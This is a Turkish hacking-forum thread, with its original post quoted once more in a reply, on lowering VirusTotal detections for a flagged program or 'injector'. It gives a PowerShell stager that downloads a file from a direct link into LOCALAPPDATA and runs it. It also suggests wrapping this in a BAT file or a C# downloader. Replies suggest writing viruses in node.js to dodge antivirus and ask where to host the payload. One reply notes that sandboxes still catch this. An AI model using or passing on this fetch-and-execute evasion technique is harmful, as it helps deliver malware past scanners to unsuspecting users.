Virustotal Sonuçlarını 0'a çekmek

emrose

Diamond Üye
Katılım
13 Şub 2023
Mesajlar
257
Beğeniler
16
Öncelikle Virustotalin Çalışma Mantığını İnceleyelim Ve 1 Adet Virüs Olarak Görülen Programımızı VirusTotal'e Sokalım

Gördüğünüz Üzere İnjector Veya Programımız Çok Yüksek Bir Sonuç Alıyor (Ekran Görüntüsü @Dreamfancy'den alındı)
Burdan Çıkardığımıza Göre VirusTotal Direkt Olarak Dosyayı Değil Ön Planda Çalışan Dosyaya Bakıyor O Zaman PowerShell Yardımı İle Bir Downloader Yapalım:​
cd $env:LOCALAPPDATA
Invoke-WebRequest -URI dosyanın direct linki -OutFile Dosyaadı.uzantısı
cd $env:LOCALAPPDATA
start "$env:LOCALAPPDATA\Dosyaadı.uzantısı"

Şimdi Bunun Üstünden Dosyamızı Direct Link Yapalım Ve Yerleştirelim Ve VirusTotal'e Yükleyelim:


Bu Tam Olarak Ne İşe Yarayacak:
Öncelikle İllegal Amaçlarla Kullanmayı Düşünen Arkadaşlar Şimdiden Vazgeçsin Çünkü Dosyanız Defender vb. Anti Virüsler Tarafından Detect Olmuşsa Bu Size FUD (Fully Undetected) İmkanı Sunmayacak :D
Legal Geliştirici Arkadaşlarım İçin İse:
Dosyanız Virus-total Yüzünden Açılmıyor İse Bu Adımdan Sonra Hazırlamış Olduğunuz PowerShell Scriptini BAT Uzantısına Çevirip Ardından Güzel Bir Şekilde C# Veya Harici Bir Dil İle Downloader Yaparak Scripti PowerShell İle Çalıştırtın Ve Bu Şekilde .EXE Uzantılı Dosyanız da VirusTotal'de Çok Düşük Sonuç Alacak Ve Müşterilerinize Daha Rahat Güven Sağlayabilirsiniz.​
 
Bu kullanıcıyla herhangi bir iş veya ticaret yapmak istiyorsanız, forumdan uzaklaştırıldığını sakın unutmayın.
Öncelikle Virustotalin Çalışma Mantığını İnceleyelim Ve 1 Adet Virüs Olarak Görülen Programımızı VirusTotal'e Sokalım

Gördüğünüz Üzere İnjector Veya Programımız Çok Yüksek Bir Sonuç Alıyor (Ekran Görüntüsü @Dreamfancy'den alındı)
Burdan Çıkardığımıza Göre VirusTotal Direkt Olarak Dosyayı Değil Ön Planda Çalışan Dosyaya Bakıyor O Zaman PowerShell Yardımı İle Bir Downloader Yapalım:​
cd $env:LOCALAPPDATA
Invoke-WebRequest -URI dosyanın direct linki -OutFile Dosyaadı.uzantısı
cd $env:LOCALAPPDATA
start "$env:LOCALAPPDATA\Dosyaadı.uzantısı"

Şimdi Bunun Üstünden Dosyamızı Direct Link Yapalım Ve Yerleştirelim Ve VirusTotal'e Yükleyelim:


Bu Tam Olarak Ne İşe Yarayacak:
Öncelikle İllegal Amaçlarla Kullanmayı Düşünen Arkadaşlar Şimdiden Vazgeçsin Çünkü Dosyanız Defender vb. Anti Virüsler Tarafından Detect Olmuşsa Bu Size FUD (Fully Undetected) İmkanı Sunmayacak :D
Legal Geliştirici Arkadaşlarım İçin İse:
Dosyanız Virus-total Yüzünden Açılmıyor İse Bu Adımdan Sonra Hazırlamış Olduğunuz PowerShell Scriptini BAT Uzantısına Çevirip Ardından Güzel Bir Şekilde C# Veya Harici Bir Dil İle Downloader Yaparak Scripti PowerShell İle Çalıştırtın Ve Bu Şekilde .EXE Uzantılı Dosyanız da VirusTotal'de Çok Düşük Sonuç Alacak Ve Müşterilerinize Daha Rahat Güven Sağlayabilirsiniz.​
İçerik güzel ama 603kb dosyayı açan enayi bulmak zor be xd
 
Bunun için uygulamalar vardı. virus totelde taramalar 0 gösteriyor fakat uygulamayı çalıştırdığın gibi virus uyarısı alıyordun (3 - 4 tane uygulama vardı arşiv gitti). Sanki daha iyi bir yöntem.
 
veya bunu virüs amaçlı yapıyorsanız node.js üzerinden kodlayın çünkü hem vt hem de antivirüslere yakalanmıyor :D
 
peki dosyayı upload etmek için hangi siteyi önerirsiniz
 
bu repoyu bırakıp kaçıyorum :iliked:
 
Sandbox ortamlar buna güldü :)
Sonradan indirilen uygulamaların dosyalarına hook atıp .exe'nin ve onun çağırıdığı processlerin neleri okuduğunu hangi dll'leri çağırdığını hangi dosyaları geçiçi olarak oluşturup sildiğini (stealarların chrome dosyalarının sonuna .db eklemesi gibi örneğin) tespit edebiliyor.
Ne yaparsanız yapın bir virüsü FUD etseniz dahi bilinçli birisine o .exe ulaştığı anda AV algılamamış algılamış önemi yok yaptığı her işlem takip edilebiliyor en azından windows özelinde
durum böyle.
 

  Şuanda konuyu görüntüleyen kullanıcılar


Üst Alt